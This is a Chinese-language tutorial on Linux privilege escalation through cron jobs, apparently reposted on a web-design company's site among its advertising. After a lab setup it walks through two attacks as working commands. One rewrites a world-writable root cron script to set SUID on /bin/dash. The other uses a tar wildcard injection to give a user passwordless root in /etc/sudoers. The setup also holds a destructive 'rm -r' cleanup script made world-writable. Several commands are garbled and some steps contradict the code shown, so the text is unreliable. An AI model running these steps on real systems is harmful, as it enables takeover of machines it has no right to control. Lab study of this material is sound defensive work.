本篇文章給大家分享的是有關(guān)Linux中怎么使用Cron Jobs實(shí)現(xiàn)提權(quán)，小編覺得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

站在用戶的角度思考問題，與客戶深入溝通，找到剛察網(wǎng)站設(shè)計(jì)與剛察網(wǎng)站推廣的解決方案，憑借多年的經(jīng)驗(yàn)，讓設(shè)計(jì)與互聯(lián)網(wǎng)技術(shù)結(jié)合，創(chuàng)造個(gè)性化、用戶體驗(yàn)好的作品，建站類型包括：做網(wǎng)站、成都做網(wǎng)站、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣、國(guó)際域名空間、虛擬空間、企業(yè)郵箱。業(yè)務(wù)覆蓋剛察地區(qū)。

Cron Jobs能做什么？

Cron Jobs可以在服務(wù)器端完成一系列計(jì)劃任務(wù)（設(shè)定時(shí)間自動(dòng)執(zhí)行命令等等），一般它主要用于執(zhí)行系統(tǒng)管理員任務(wù)，例如數(shù)據(jù)備份或清理緩存目錄等等。Cron這個(gè)詞來源于“crontab”，而這個(gè)玩意兒存在于/etc目錄中。

比如說，在crontab中，我們添加下列條目來實(shí)現(xiàn)每隔一個(gè)小時(shí)就自動(dòng)打印出apache的錯(cuò)誤日志“

1 0 ** * printf "" > /var/log/apache/error_log

Crontab文件重寫

設(shè)置簡(jiǎn)陋配置的Cron任務(wù)

目標(biāo)：在crontab的幫助下，設(shè)置一個(gè)新的任務(wù)來運(yùn)行目標(biāo)Python腳本，并清除指定目錄中的全部數(shù)據(jù)。

假設(shè)目錄名稱為“cleanup“，它的數(shù)據(jù)每隔兩分鐘就會(huì)被自動(dòng)清空一次。在開始之前我們需要在/home/cleanup中存儲(chǔ)一些數(shù)據(jù)：

mkdir cleanup
cd cleanup
echo "hello freinds" > 1.txt
echo "ALL files will be deleted in 2 mints" > 2.txt
echo "" > 1.php
echo "" > 2.php
ls

接下來，編寫一個(gè)Python腳本來刪除/home/cleanup目錄中的數(shù)據(jù)，我們需要給這個(gè)腳本完整的r/w/x權(quán)限。

切換目錄并創(chuàng)建腳本：

cd /tmp
nano cleanup.py

腳本代碼：

#!/usr/bin/envpython
import os
import sys
try:
os.system('rm -r /home/cleanup/* ')
except:
sys.exit()

賦予權(quán)限：

chmod 777 cleanup.py

最后配合crontab設(shè)置計(jì)劃任務(wù)，并每隔兩分鐘運(yùn)行一次cleanup.py :

nano /etc/crontab
*/2*   * * *   root    /tmp /cleanup.py

驗(yàn)證結(jié)果：

cd /home/cleanup
ls
date
ls

大家可以看到數(shù)據(jù)每隔兩分鐘就會(huì)被清空一次。

后滲透利用

開啟你的攻擊設(shè)備，然后入侵目標(biāo)系統(tǒng)，接下來直接進(jìn)到提權(quán)步驟。假設(shè)我們已經(jīng)通過ssh成功登錄了目標(biāo)設(shè)備，并訪問了非root用戶終端，然后執(zhí)行以下命令：

cat /etc/crontab
ls -al /tmp/cleanup.py
cat /tmp/cleanup.py

我們此時(shí)可以發(fā)現(xiàn)，crontab每隔兩分鐘便會(huì)運(yùn)行一次Python腳本，我們待會(huì)兒需要利用這一點(diǎn)。

啟用/bin/dash的SUID，使用nano打開cleanup.py ，并將其中的“rm -r /tmp/*”替換成下列內(nèi)容：

os.system('chmod u+s /bin/dash')

兩分鐘之后，它將會(huì)給/bin/dash設(shè)置SUID權(quán)限，運(yùn)行之后你就能拿到root權(quán)限了：

/bin/dash
id
whoami

Crontab Tar通配符注入

環(huán)境搭建

目標(biāo)：在crontab的幫助下設(shè)置一個(gè)計(jì)劃任務(wù)，備份HTML目錄中的tar文檔。

注意，該目錄需要具備可執(zhí)行權(quán)限（x）。

然后每隔一分鐘將/html目錄中的tar文件備份到/var/backups中：

nano /etc/crontab
*/1*   * * *   root tar -zcf /var/backups/html.tgz/var/www/html/*

執(zhí)行下列命令查看運(yùn)行結(jié)果：

cd /var/backup
ls
date

從下圖中我們可以看到，一分鐘之后html.tgz文件已經(jīng)生成了：

后滲透利用

開啟你的攻擊設(shè)備，然后入侵目標(biāo)系統(tǒng)，接下來直接進(jìn)到提權(quán)步驟。假設(shè)我們已經(jīng)通過ssh成功登錄了目標(biāo)設(shè)備，并訪問了非root用戶終端。接下來，打開crontab查看計(jì)劃任務(wù)是否已經(jīng)設(shè)置成功：

cat /etc/crontab

執(zhí)行下列命令來授權(quán)sudo權(quán)限，并登錄用戶賬號(hào)，即實(shí)現(xiàn)通配符注入：

echo'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers'>test.sh
echo"" > "--checkpoint-action=exec=sh test.sh"
echo"" > --checkpoint=1
tarcf archive.tar *

一分鐘之后，它將會(huì)給用戶ignite賦予sudo權(quán)限：

sudo -l
sudo bash
whoami

以上就是Linux中怎么使用Cron Jobs實(shí)現(xiàn)提權(quán)，小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘９ぷ鲿?huì)見到或用到的。希望你能通過這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

分享文章：Linux中怎么使用CronJobs實(shí)現(xiàn)提權(quán)
URL分享：http://jinyejixie.com/article36/ijjgsg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站策劃、定制網(wǎng)站、品牌網(wǎng)站制作、網(wǎng)站收錄、軟件開發(fā)、建站公司

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)